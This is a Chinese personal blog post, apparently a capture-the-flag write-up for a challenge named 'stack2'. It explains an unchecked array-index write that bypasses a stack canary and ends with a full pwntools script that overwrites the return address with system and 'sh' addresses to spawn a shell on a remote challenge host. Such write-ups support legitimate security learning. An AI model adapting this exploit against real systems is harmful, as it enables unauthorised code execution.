<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  
  <title>stack2 | wolcome</title>

  <!-- keywords -->
  

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="1.file命令查看为32位 2.checksec命令查看保护机制 由保护机制我想到的做本题的方法（1）绕过canary保护（2）rop链控制执行流 3.做题首先运行一下，查看程序的运行过程  因为做题的关键就在输入输出，本题的输入的作用显而易见，5个选项输入。因此我们可以查看伪c代码并多多观察输入的位置，查看是否有漏洞可以利用。  查看字符串列表发现了熟悉的system函数与、bin/bash可">
<meta property="og:type" content="article">
<meta property="og:title" content="stack2">
<meta property="og:url" content="http://yoursite.com/2019/10/11/stack2/index.html">
<meta property="og:site_name" content="wolcome">
<meta property="og:description" content="1.file命令查看为32位 2.checksec命令查看保护机制 由保护机制我想到的做本题的方法（1）绕过canary保护（2）rop链控制执行流 3.做题首先运行一下，查看程序的运行过程  因为做题的关键就在输入输出，本题的输入的作用显而易见，5个选项输入。因此我们可以查看伪c代码并多多观察输入的位置，查看是否有漏洞可以利用。  查看字符串列表发现了熟悉的system函数与、bin/bash可">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://yoursite.com/2019/10/11/stack2/2.png">
<meta property="og:image" content="http://yoursite.com/2019/10/11/stack2/1.png">
<meta property="og:image" content="http://yoursite.com/2019/10/11/stack2/3.png">
<meta property="og:image" content="http://yoursite.com/2019/10/11/stack2/4.png">
<meta property="og:image" content="http://yoursite.com/2019/10/11/stack2/5.png">
<meta property="og:image" content="http://yoursite.com/2019/10/11/stack2/6.png">
<meta property="og:updated_time" content="2019-10-15T04:55:01.084Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="stack2">
<meta name="twitter:description" content="1.file命令查看为32位 2.checksec命令查看保护机制 由保护机制我想到的做本题的方法（1）绕过canary保护（2）rop链控制执行流 3.做题首先运行一下，查看程序的运行过程  因为做题的关键就在输入输出，本题的输入的作用显而易见，5个选项输入。因此我们可以查看伪c代码并多多观察输入的位置，查看是否有漏洞可以利用。  查看字符串列表发现了熟悉的system函数与、bin/bash可">
<meta name="twitter:image" content="http://yoursite.com/2019/10/11/stack2/2.png">
  
    <link rel="alternative" href="/atom.xml" title="wolcome" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/a.ico">
  
  <link rel="stylesheet" href="/css/style.css">
  
  

  <script src="//cdn.bootcss.com/require.js/2.3.2/require.min.js"></script>
  <script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>

  
</head></html>
<body>
  <div id="container">
    <div id="particles-js"></div>
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
	<header id="header" class="inner">
		<a href="/" class="profilepic">
			
			<img lazy-src="https://i.loli.net/2019/10/03/3uoc9vTaPFtG8Hb.jpg" class="js-avatar">
			
		</a>

		<hgroup>
		  <h1 class="header-author"><a href="/">zzl</a></h1>
		</hgroup>

		

		
			<div class="switch-btn">
				<div class="icon">
					<div class="icon-ctn">
						<div class="icon-wrap icon-house" data-idx="0">
							<div class="birdhouse"></div>
							<div class="birdhouse_holes"></div>
						</div>
						<div class="icon-wrap icon-ribbon hide" data-idx="1">
							<div class="ribbon"></div>
						</div>
						
						<div class="icon-wrap icon-link hide" data-idx="2">
							<div class="loopback_l"></div>
							<div class="loopback_r"></div>
						</div>
						
						
					</div>
					
				</div>
				<div class="tips-box hide">
					<div class="tips-arrow"></div>
					<ul class="tips-inner">
						<li>菜单</li>
						<li>标签</li>
						
						<li>友情链接</li>
						
						
					</ul>
				</div>
			</div>
		

		<div class="switch-area">
			<div class="switch-wrap">
				<section class="switch-part switch-part1">
					<nav class="header-menu">
						<ul>
						
							<li><a href="/">主页</a></li>
				        
							<li><a href="/archives">所有文章</a></li>
				        
						</ul>
					</nav>
					<nav class="header-nav">
						<div class="social">
							
						</div>
					</nav>
				</section>
				
				
				<section class="switch-part switch-part2">
					<div class="widget tagcloud" id="js-tagcloud">
						<a href="/tags/level0做题收获/" style="font-size: 10px;">level0做题收获</a> <a href="/tags/什么是shell/" style="font-size: 10px;">什么是shell?</a> <a href="/tags/写的挺乱的，大家理解着看一下，讲的都是简单的。/" style="font-size: 10px;">写的挺乱的，大家理解着看一下，讲的都是简单的。</a> <a href="/tags/学习python/" style="font-size: 10px;">学习python</a> <a href="/tags/对栈的一些理解/" style="font-size: 10px;">对栈的一些理解</a>
					</div>
				</section>
				
				
				
				<section class="switch-part switch-part3">
					<div id="js-friends">
					
			          <a target="_blank" class="main-nav-link switch-friends-link" href="https://github.com/smackgg/hexo-theme-smackdown">smackdown</a>
			        
			        </div>
				</section>
				

				
			</div>
		</div>
	</header>				
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
  	<div class="overlay">
  		<div class="slider-trigger"></div>
  		<h1 class="header-author js-mobile-header hide">zzl</h1>
  	</div>
	<div class="intrude-less">
		<header id="header" class="inner">
			<div class="profilepic">
				<img lazy-src="https://i.loli.net/2019/10/03/3uoc9vTaPFtG8Hb.jpg" class="js-avatar">
			</div>
			<hgroup>
			  <h1 class="header-author">zzl</h1>
			</hgroup>
			
			<nav class="header-menu">
				<ul>
				
					<li><a href="/">主页</a></li>
		        
					<li><a href="/archives">所有文章</a></li>
		        
		        <div class="clearfix"></div>
				</ul>
			</nav>
			<nav class="header-nav">
				<div class="social">
					
				</div>
			</nav>
		</header>				
	</div>
</nav>
      <div class="body-wrap"><article id="post-stack2" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2019/10/11/stack2/" class="article-date">
  	<time datetime="2019-10-11T14:06:49.000Z" itemprop="datePublished">2019-10-11</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      stack2
      
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>1.file命令查看为32位</p>
<p>2.checksec命令查看保护机制<br><img src="/2019/10/11/stack2/2.png" alt></p>
<p>由保护机制我想到的做本题的方法<br>（1）绕过canary保护<br>（2）rop链控制执行流</p>
<p>3.做题首先运行一下，查看程序的运行过程</p>
<p><img src="/2019/10/11/stack2/1.png" alt></p>
<p>因为做题的关键就在输入输出，本题的输入的作用显而易见，5个选项输入。因此我们可以查看伪c代码并多多观察输入的位置，查看是否有漏洞可以利用。</p>
<p><img src="/2019/10/11/stack2/3.png" alt></p>
<p>查看字符串列表发现了熟悉的system函数与、bin/bash<br>可以考虑使用覆盖返回地址，但本题开了保护，不能直接栈溢出，所以接着看伪代码。</p>
<p><img src="/2019/10/11/stack2/4.png" alt></p>
<p>在这里可以看到，没有限制v5的值，也就是我们可以通过这个更改距离v13任意位置的值设为v7，即通过两次输入更改值，那我们是否可以直接找到返回地址的位置并且改为system 的地址呢？<br>很明显是可以的。那么偏移是多少呢？</p>
<p><img src="/2019/10/11/stack2/5.png" alt></p>
<p>v13距离栈底0x70<br>所以距离是不是就是0x70+0x4呢？<br>大家可以先思考一下。</p>
<p>这里查询到返回地址和输入的地址。就可以利用差值得出结果0x84<br>但是不知道为什么0x74却不行</p>
<p>这一题在覆盖返回地址时因为更改的数组的单个字节。是所以要用到多次写入。</p>
<p>本题需要知道小端模式，现代计算机通常使用的一种内存排列格式</p>
<p><img src="/2019/10/11/stack2/6.png" alt><br>下面是脚本</p>
<pre><code>#!/usr/bin/python
#coding:utf-8

from pwn import*






system_addr=0x080485AF
leave_offset=0x84


def write_addr(addr,va):
    io.sendline(&quot;3&quot;)
    io.recvuntil(&quot;which number to change:\n&quot;)
    io.sendline(str(addr))
    io.recvuntil(&quot;new number:\n&quot;)
    io.sendline(str(va))
    io.recvuntil(&quot;5. exit\n&quot;)

io=remote(&apos;111.198.29.45&apos;,&apos;31725&apos;)
io.recvuntil(&quot;How many numbers you have:\n&quot;)
io.sendline(&quot;1&quot;)
io.recvuntil(&quot;Give me your numbers\n&quot;)
io.sendline(&quot;1&quot;)
io.recvuntil(&quot;5. exit\n&quot;)


# write  system_addr  0x08048450

write_addr(leave_offset,0X50)
write_addr(leave_offset+1,0X84)
write_addr(leave_offset+2,0X04)
write_addr(leave_offset+3,0X08)
# sh_addr  0x08048987
leave_offset+=8
print leave_offset
write_addr(leave_offset,0x87)
write_addr(leave_offset+1,0X89)
write_addr(leave_offset+2,0X04)
write_addr(leave_offset+3,0X08)

io.sendline(&quot;5&quot;)
io.interactive()    </code></pre>
      
    </div>
    
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2019/10/11/ubuntu16-04配置/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">ubuntu16.04配置</div>
      <strong class="article-nav-caption">&gt;</strong>
    </a>
  
</nav>

  
</article>






</div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info">
      <div class="footer-left">
        &copy; 2019 zzl
      </div>
        <div class="footer-right">
          <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/smackgg/hexo-theme-smackdown" target="_blank">Smackdown</a>
        </div>
    </div>
  </div>
</footer>
    </div>
    
  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">


<script>
	var yiliaConfig = {
		fancybox: true,
		mathjax: true,
		animate: true,
		isHome: false,
		isPost: true,
		isArchive: false,
		isTag: false,
		isCategory: false,
		open_in_new: false
	}
</script>
<script src="/js/main.js"></script>



<script type="text/x-mathjax-config">
MathJax.Hub.Config({
    tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    }
});

MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';                 
    }       
});
</script>

<script src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js"></script>


  </div>
</body>
</html>